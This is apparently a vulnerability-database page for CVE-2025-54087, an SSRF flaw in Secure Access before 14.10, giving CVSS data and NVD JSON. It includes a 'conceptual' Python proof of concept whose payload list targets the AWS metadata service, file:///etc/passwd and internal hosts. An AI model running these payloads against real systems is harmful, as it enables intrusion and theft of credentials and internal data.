Security Vulnerability Report
中文
CVE-2025-54087 CVSS 2.6 LOW

CVE-2025-54087

Published: 2025-10-02 20:15:33
Last Modified: 2025-10-16 18:22:43
Source: [email protected]

Description

CVE-2025-54087 is a server-side request forgery vulnerability in Secure Access prior to version 14.10. Attackers with administrative privileges can publish a crafted test HTTP request originating from the Secure Access server. The attack complexity is high, there are no attack requirements, and user interaction is required. There is no direct impact to confidentiality, integrity, or availability. There is a low severity subsequent system impact to integrity.

CVSS Details

CVSS Score
2.6
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:absolute:secure_access:*:*:*:*:*:*:*:* - VULNERABLE
NetMotion Secure Access < 14.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-54087 - NetMotion Secure Access SSRF PoC (Conceptual) # This PoC demonstrates the SSRF attack vector through the HTTP test request feature # Note: Requires valid administrative credentials import requests TARGET_HOST = "https://secure-access-target:443" ADMIN_USER = "admin" ADMIN_PASS = "admin_password" # Step 1: Authenticate to Secure Access admin console session = requests.Session() login_url = f"{TARGET_HOST}/admin/login" login_data = { "username": ADMIN_USER, "password": ADMIN_PASS } session.post(login_url, data=login_data, verify=False) # Step 2: Exploit SSRF via HTTP test request feature # The crafted URL is sent from the Secure Access server's perspective ssrf_payloads = [ "http://169.254.169.254/latest/meta-data/", # AWS metadata "http://127.0.0.1:8080/admin/config", # Internal admin panel "http://internal-db.local:3306/", # Internal database "file:///etc/passwd", # Local file read "http://192.168.1.1/management", # Internal network scan ] test_request_url = f"{TARGET_HOST}/admin/tools/test-http-request" for payload in ssrf_payloads: data = { "url": payload, "method": "GET", "timeout": 10 } response = session.post(test_request_url, data=data, verify=False) print(f"Target: {payload}") print(f"Response: {response.text[:500]}") print("-" * 50) # Step 3: Extract sensitive information from responses # The server-side response may contain internal network information

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54087", "sourceIdentifier": "[email protected]", "published": "2025-10-02T20:15:32.830", "lastModified": "2025-10-16T18:22:43.163", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CVE-2025-54087 is a server-side request forgery\nvulnerability in Secure Access prior to version 14.10. Attackers with\nadministrative privileges can publish a crafted test HTTP request originating\nfrom the Secure Access server. The attack complexity is high, there are no\nattack requirements, and user interaction is required. There is no direct\nimpact to confidentiality, integrity, or availability. There is a low severity\nsubsequent system impact to integrity."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:H/UI:A/VC:N/VI:N/VA:N/SC:N/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.8, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:N/I:L/A:N", "baseScore": 2.6, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.0, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:absolute:secure_access:*:*:*:*:*:*:*:*", "versionEndExcluding": "14.10", "matchCriteriaId": "A4C71B0A-C4A4-421F-A1B4-0CCD7FECEBF1"}]}]}], "references": [{"url": "https://www.absolute.com/platform/security-information/vulnerability-archive/cve-2025-54087", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.